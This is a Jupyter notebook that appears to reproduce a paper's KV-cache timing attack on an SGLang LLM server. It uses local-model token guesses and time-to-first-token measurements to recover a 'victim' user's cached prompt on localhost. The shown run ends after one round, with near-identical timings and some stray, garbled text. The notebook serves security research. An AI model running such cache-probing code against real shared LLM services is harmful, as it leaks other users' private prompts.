In [9]:
import json
import time
import aiohttp
import asyncio
import random
from typing import Tuple, Dict, List, Any, Optional
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
from datasets import load_dataset
from itertools import islice

import aiohttp, json, time

import requests
import time
import requests
import json
import random
import string
from sglang.utils import print_highlight
import asyncio
import aiohttp
import numpy as np
from transformers import AutoTokenizer
from datasets import load_dataset
from collections import Counter
from tqdm import tqdm
import multiprocessing
import pandas as pd
from tqdm.asyncio import tqdm_asyncio

In [10]:
SGLANG_URL = "http://localhost:30000/generate"
DATASET_NAME = "fka/awesome-chatgpt-prompts"
NUM_USERS = 1  # Single victim user as per paper's evaluation
REQUESTS_PER_USER = 40  # As mentioned in paper
REQUEST_FREQUENCY = 0.004  # requests per second (0.004 = 40 requests per 3 hours)

In [35]:

async def fetch_metrics_raw(session, prompt, request_id, URL):
    payload = {
        "model": "default", 
        "messages": [{"role": "user", "content": prompt}],
        "stream": True,
        "temperature": 0,
        "session_id":0,
        "max_tokens":10
    }
    start_time = time.perf_counter()
    first_token_time = None
    token_count = 0
    ttft = 0
    restext=""
    async with session.post(URL, json=payload) as response:
        if response.status != 200:
            return {"id": request_id, "error": f"HTTP {response.status}", "status": "fail"}
        async for line in response.content:
            decoded_line = line.decode('utf-8').strip()
            if decoded_line.startswith("data: "):
                # print(decoded_line)
                json_str = decoded_line[6:]
                if json_str == "[DONE]":
                    break
                obj = json.loads(json_str)
                # print(obj)
                delta = obj["choices"][0].get("delta", {})
                token = delta.get("content", "")             
                # print(token)
                if token:
                    restext+=token
                    if first_token_time is None:
                        first_token_time = time.perf_counter()
                        ttft = first_token_time - start_time
                    token_count += 1
        end_time = time.perf_counter()
        tpot = 0
        if token_count > 1 and first_token_time:
            generation_time = end_time - first_token_time
            tpot = generation_time / (token_count - 1)
        return {
            "id": request_id,
            "prompt": prompt,
            "ttft_ms": ttft * 1000 if ttft else 0,
            "tpot_ms": tpot * 1000,
            "tokens": token_count,
            "status": "success",
            "restext":restext
        }

async def main(attack_prompts, URL):
    async with aiohttp.ClientSession() as session:
        print(f"⚡ Sending {len(attack_prompts)} requests to SGLang ({URL})...\n")
        tasks = []
        for i, prompt in enumerate(attack_prompts):
            tasks.append(fetch_metrics_raw(session, prompt, i, URL))
        results = await tqdm_asyncio.gather(*tasks, desc="Attacking")
        print(f"{'ID':<3} | {'TTFT (ms)':<10} | {'TPOT (ms)':<10} | {'Tokens':<6} | {'Prompt Snippet'}")
        print("-" * 70)
        successful_results = []
        for res in results:
            if res["status"] == "success":
                print(f"{res['id']:<3} | {res['ttft_ms']:<10.2f} | {res['tpot_ms']:<10.2f} | {res['tokens']:<6} | {res['prompt'][:30]} | {res.get('restext', '')[:30]}")
                successful_results.append(res)
            else:
                print(f"{res['id']:<3} | {'ERROR':<10} | {'-':<10} | {'-':<6} | {res['error']}")
        if successful_results:
            ttfts = [r['ttft_ms'] for r in successful_results]
            tpots = [r['tpot_ms'] for r in successful_results]
            best_request = min(successful_results, key=lambda x: x['ttft_ms'])
            
            print("\n--- Summary ---")
            print(f"Avg TTFT: {np.mean(ttfts):.2f} ms")
            print(f"Avg TPOT: {np.mean(tpots):.2f} ms")
            print("-" * 30)
            print(f"Min TTFT:        {best_request['ttft_ms']:.2f} ms")
            print(f"Min TTFT Prompt: \"{best_request['prompt']}\"")
        return best_request, successful_results

In [19]:
def chunk_list(data, chunk_size):
    it = iter(data)
    while True:
        chunk = list(islice(it, chunk_size))
        if not chunk:
            break
        yield chunk
# --- Configuration Constants ---

async def stream_ttft(
    session: aiohttp.ClientSession,
    url: str,
    payload: dict,
):
    start = time.perf_counter()

    async with session.post(url, json=payload) as resp:
        if resp.status != 200:
            return {
                "status": f"HTTP_{resp.status}",
                "ttft": None,
                "token": None,
            }

        async for raw in resp.content:
            line = raw.decode("utf-8", errors="ignore").strip()
            if not line:
                continue

            # Handle SSE
            if line.startswith("data:"):
                line = line[5:].strip()

            if line == "[DONE]":
                break

            token = ""

            # Try JSON first
            try:
                obj = json.loads(line)

                # Most common SGLang / vLLM format
                if "text" in obj:
                    token = obj["text"]

                # OpenAI-style delta format (just in case)
                elif "choices" in obj:
                    delta = obj["choices"][0].get("delta", {})
                    token = delta.get("content", "")

            except json.JSONDecodeError:
                # Fallback: treat raw line as token
                token = line

            if token:
                ttft = time.perf_counter() - start
                return {
                    "status": "OK",
                    "ttft": ttft,
                    "token": token,
                }

    return {
        "status": "NO_TOKEN",
        "ttft": None,
        "token": None,
    }
# NOTE: This URL is used for context only; the actual network calls are mocked.
SGLANG_SERVICE_URL = "http://localhost:30000/generate"
SGLANG_ATTACK_URL="http://localhost:30000/v1/chat/completions"
# LOCAL_MODEL_PATH = "Qwen/Qwen2.5-1.5B-Instruct"
HF_TOKEN = ""
# LOCAL_MODEL_PATH="chaejin98330/Qwen2.5-0.5B-Finetuned"
LOCAL_MODEL_PATH="../../results/"
DATASET_NAME = "fka/awesome-chatgpt-prompts"

tokenizer = AutoTokenizer.from_pretrained(LOCAL_MODEL_PATH,
    token=HF_TOKEN)
model = AutoModelForCausalLM.from_pretrained(LOCAL_MODEL_PATH,
    token=HF_TOKEN)
# ====================================================================
# MOCK DEPENDENCIES (For Simulation)
# ====================================================================

class KV_Simulator:
    """
    Mocks the KV Cache and Longest Prefix Match (LPM) detection.
    This simulates the cache state of the SGlang service.
    """
    def __init__(self):
        self.cache: List[str] = []
        # Pre-populate with common prefixes for testing hits
        self.add_to_cache("The quick brown fox jumps over the lazy dog")
        self.add_to_cache("What are the steps involved in running a multi-tenant LLM service")
        self.add_to_cache("The best way to start a day is by getting up early")

    def add_to_cache(self, sequence: str):
        """Adds a sequence to the cache."""
        if sequence not in self.cache:
            self.cache.append(sequence)

    def get_lpm_score(self, sequence: str) -> int:
        """
        Calculates the Longest Prefix Match score (reused tokens).
        """
        max_match_len = 0
        # Normalize tokenization by splitting on space
        sequence_tokens = sequence.lower().split() 

        for cached_seq in self.cache:
            cached_tokens = cached_seq.lower().split()
            match_len = 0
            
            for i in range(min(len(sequence_tokens), len(cached_tokens))):
                if sequence_tokens[i] == cached_tokens[i]:
                    match_len += 1
                else:
                    break
            
            max_match_len = max(max_match_len, match_len)
            
        return max_match_len
def flush_cache():
    flushurl = f"http://localhost:30000/flush_cache"
    response=requests.post(flushurl)
    return

# ====================================================================
# INFERENCE CLIENT (The Attacker)
# ====================================================================

class InferenceClient:
    def __init__(self, url: str):
        self.url = url
        self.kv_simulator = KV_Simulator()
        self.LOCAL_MODEL_PATH = LOCAL_MODEL_PATH
        self.DATASET_NAME = DATASET_NAME
        
        # Simulated tokens derived from the Qwen model on the chat prompts dataset
        self.DRAFT_TOKENS = [" and", " the", " to", " is", " a", " of", " in", " that", 
                             " for", " by", " with", " it", " as", " be", " an", " me", " you", 
                             ".", ",", " what", " are", " steps", " to", " make", " best", " day"]


    # --- Component 1: Simulates the Local LLM Generating SINGLE-TOKEN Candidates ---
    def predict_next_token_local_llm(self, current_prefix: str, num_candidates: int) -> List[str]:
        """
        Generates a small list of likely next tokens, simulating the output
        of a Qwen model guided by the current prefix for context.
        
        NOTE: The following block shows the real 'transformers' implementation.
        Since it cannot be executed, a sophisticated mock is used below.
         """
        input_prompt = f"You are an LLM designed to predict the next sentence based on the previous context, predict the next token after input: '{current_prefix}'"
       
        
        try:
            input_ids = tokenizer.encode(current_prefix, return_tensors="pt")
            with torch.no_grad():
                outputs = model(input_ids)
                next_token_logits = outputs.logits[:, -1, :]
                # Get top 'num_candidates' tokens
                top_k_indices = torch.topk(next_token_logits, num_candidates).indices.squeeze(0)
            
            candidates = [tokenizer.decode(idx.item()) for idx in top_k_indices]
          
            return candidates
            # pass 
        except Exception as e:
            import traceback 
            traceback.print_exc()
            print(f"Exception happened {e}, {current_prefix}")
            pass

    async def victim_simulation(self, input_sequences: str, max_tokens_to_recover: int, num_candidates: int = 10, track_kv: bool = False) -> Tuple[str, Dict]:
        """
        Iteratively recovers the victim's request one token at a time
        using the LPM side-channel[cite: 1905].
        """
        
        all_token_metrics = []
        
        # 3. Run parallel requests to find the maximum LPM hit
        async with aiohttp.ClientSession() as session:
            tasks = [self._send_token_peek_request_victim(session, seq, track_kv) for seq in input_sequences]
            results = await asyncio.gather(*tasks)
        return results    


    async def _send_token_peek_request_victim(self, session: aiohttp.ClientSession, full_sequence: str, track_kv: bool) -> Dict:

        payload = {
            "model": "Qwen/Qwen2.5-1.5B-Instruct",
            "text": full_sequence,
            "max_new_tokens": 10,  # Generate some tokens to ensure caching
            "stream": False,
            "ignore_eos": True,  # If supported by your SGLang version,
            "session_id":0,
            "temperature":0,
            
        }
        
        start_time = time.time()
        full_response_text = ""
        first_token_latency = None
        text_chunk_final = ""
      
        try:
            async with aiohttp.ClientSession() as session:
                async with session.post(self.url, json=payload) as response:
                    if response.status == 200:

                        # 2. Iterate over the response stream line by line
                        async for line in response.content:
                            line = line.decode('utf-8').strip()
                            # Skip empty keep-alive lines
                            if not line:
                                continue
                                
                            # Standard LLM streaming format usually starts with "data: "
                            if line.startswith("data:"):
                                data_str = line[5:].strip() # Remove "data: " prefix
                                
                                # Check for the stop signal (common in OpenAI-compatible APIs)
                                if data_str == "[DONE]":
                                    break
                                
                                try:
                                    chunk = json.loads(data_str)
                                    
                                    # Extract text based on standard API formats
                                    # Adjust key access depending on your specific SGLang endpoint version
                                    text_chunk = chunk.get("text", "") 
                                    
                                    if text_chunk:
                                        first_token_latency = time.time() - start_time
                                        text_chunk_final += text_chunk
                                        
                                    if text_chunk:
                                        # Record Time to First Token (TTFT)
                                        if first_token_latency is None:
                                            first_token_latency = time.time() - start_time
                                            
                                        full_response_text += text_chunk
                                        
                                except json.JSONDecodeError:
                                    continue

                        total_latency = time.time() - start_time
                        
                        # 3. Simulate KV cache update (done after full response is received)
               
                        lpm_score = 0

                        return text_chunk_final, total_latency
                    else:
                        return f"ERROR_{response.status}", time.time() - start_time, {}
                        
        except Exception as e:
            return f"ERROR_{str(e)}", time.time() - start_time, {}

The module name  (originally ) is not a valid Python identifier. Please rename the original module to avoid import issues.


In [20]:
client = InferenceClient(url=SGLANG_SERVICE_URL)
    
    
DATASET_NAME = "fka/awesome-chatgpt-prompts"

    # Load ALL splits (this dataset has only "train")
dataset = load_dataset(DATASET_NAME)
item=dataset["train"][0]

In [45]:
# --- 1. VICTIM CACHE INJECTION (Simulating the victim running their request) ---
victim_request = item["prompt"]


# The victim's full request is stored in the cache (LPM tree)[cite: 1895, 1982].
print(f"--- VICTIM CACHE INJECTION ---")
# client.kv_simulator.add_to_cache(victim_request)
flush_cache()
# for i in range(20):
# Recover up to 10 additional tokens
recovered_request = await client.victim_simulation(
    input_sequences=[victim_request,victim_request], 
    max_tokens_to_recover=10, 
    num_candidates=15, 
    track_kv=True # Enable the LPM side-channel logic
)
recovered_request=recovered_request[0]

print(f"Victim's full request added to cache: '{victim_request}'")
# print(f"Victim's response request added to cache: '{recovered_request[0][:30]}'")
print(f"Cache size: {len(client.kv_simulator.cache)} entries.\n")

--- VICTIM CACHE INJECTION ---
Victim's full request added to cache: 'Imagine you are an experienced Ethereum developer tasked with creating a smart contract for a blockchain messenger. The objective is to save messages on the blockchain, making them readable (public) to everyone, writable (private) only to the person who deployed the contract, and to count how many times the message was updated. Develop a Solidity smart contract for this purpose, including the necessary functions and considerations for achieving the specified goals. Please provide the code and any relevant explanations to ensure a clear understanding of the implementation.'
Cache size: 3 entries.



In [46]:
split_index=3
words_to_recover = len(victim_request.split())
known_prefix = " ".join(victim_request.split(".")[0].split()[:split_index])
next_token = " ".join(victim_request.split(".")[0].split()[split_index+1])
candidates=client.predict_next_token_local_llm(known_prefix,10)
print(known_prefix)
print(candidates)
attackprompts=[known_prefix+candidate for candidate in candidates]

Imagine you are
[' a', ' an', ' working', ' the', ' playing', ' designing', ' tasked', ' planning', ' developing', ' organizing']


In [47]:
best,success=await main(attackprompts, SGLANG_ATTACK_URL)

⚡ Sending 10 requests to SGLang (http://localhost:30000/v1/chat/completions)...



Attacking: 100%|██████████| 10/10 [00:00<00:00, 81.86it/s]

ID  | TTFT (ms)  | TPOT (ms)  | Tokens | Prompt Snippet
----------------------------------------------------------------------
0   | 79.61      | 4.46       | 10     | Imagine you are a | <think>
Okay, the user wants m
1   | 76.58      | 4.73       | 10     | Imagine you are an | <think>
Okay, the user wants m
2   | 79.38      | 4.45       | 10     | Imagine you are working | <think>
Okay, the user wants m
3   | 79.99      | 4.47       | 10     | Imagine you are the | <think>
Okay, the user wants m
4   | 79.32      | 4.45       | 10     | Imagine you are playing | <think>
Okay, the user wants m
5   | 79.88      | 4.47       | 10     | Imagine you are designing | <think>
Okay, the user wants m
6   | 79.48      | 4.46       | 10     | Imagine you are tasked | <think>
Okay, the user wants m
7   | 80.15      | 4.46       | 10     | Imagine you are planning | <think>
Okay, the user wants m
8   | 79.12      | 4.42       | 10     | Imagine you are developing | <think>
Okay, the user wants m
9


